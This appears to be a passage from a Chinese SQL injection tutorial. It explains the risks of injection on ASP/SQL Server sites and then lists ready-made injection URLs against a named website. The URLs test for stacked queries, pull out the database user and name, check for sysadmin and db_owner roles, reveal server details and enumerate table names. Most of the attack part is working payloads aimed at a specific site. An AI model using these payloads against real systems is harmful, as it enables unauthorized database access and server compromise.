SQL注入解说

5、SQL注入漏洞的风险

    由于SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。

    无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制，如果你的网络应用程序开发者没有遵循安全代码进行开发，攻击者将通过80端口进入你的系统。

    例如，如果一个网站的数据库系统为SQL Server 2000数据库，同时没有在数据库的权限设置上做好安全限制，将导致严重的后果。SQL注入意味着数据库也会被攻破，入侵者得到当前数据库权限的同时，也获得了整个数据库服务器的管理权限，入侵者可通过数据库管理权限得到系统权限，并为所欲为。

    再者，很多网站的管理后台都可经由公网直接访问到后台管理登录页面，并且可通过暴力猜解等方式对后台管理账户进行猜解。对于任何一个网站的后台管理登录页，安全的做法应该是限制访问。尤其是对于政府及银行网络来说，更不应该将后台管理页面放置到公网上任由访问，这样的话安全系数会大大减少，遭受攻击的机会却大大增加了。

6、SQL注入之asp注入常用语句

是否支持多句查询
http://www.amxking.com/xxxnews/shownews.asp?id=51;declare @a int--

是否支持子查询
http://www.amxking.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0

返回用户名
http://www.amxking.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0

当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.amxking.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

当前用户是否为 db_owner 固定数据库角色的成员
http://www.amxking.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

返回数据库名
http://www.amxking.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0

操作系统和SQLserver版本
http://www.amxking.com/xxxnews/shownews.asp?id=51 And @@version = 1

本地服务器名称
http://www.amxking.com/xxxnews/shownews.asp?id=51 And @@SERVERNAME = 1

http://www.amxking.com/newhomelink/site/News/Content.asp?NewsID=1077  And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名

上一页  [1] [2]